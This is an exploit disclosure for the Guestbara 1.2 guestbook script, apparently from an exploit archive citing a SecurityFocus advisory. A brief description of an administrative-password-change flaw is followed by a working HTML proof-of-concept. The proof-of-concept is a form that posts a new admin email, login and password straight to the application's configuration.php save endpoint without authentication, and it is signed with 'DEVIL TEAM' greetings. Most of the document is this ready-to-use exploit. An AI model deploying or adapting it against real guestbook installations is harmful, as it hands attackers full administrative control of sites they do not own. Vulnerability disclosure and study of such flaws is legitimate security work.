source: https://www.securityfocus.com/bid/23029/info
Guesbara is prone to a vulnerability that may permit attackers to change the administrative
password.
Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application.
<html> <title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title> <table border=0 cellspacing=0 cellpadding=0 align='center'> <form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr> <tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr> <tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr> <tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr> <tr><td colspan=2 align=center> <p> <input type='submit' name='submit' value='Zachowaj'> </p> <p>by Kacper </p> <p>for</p> <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr> </form></table> <p> </p> <p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p> <p align="center">Greetz @ll DEVIL TEAM </p> </html>
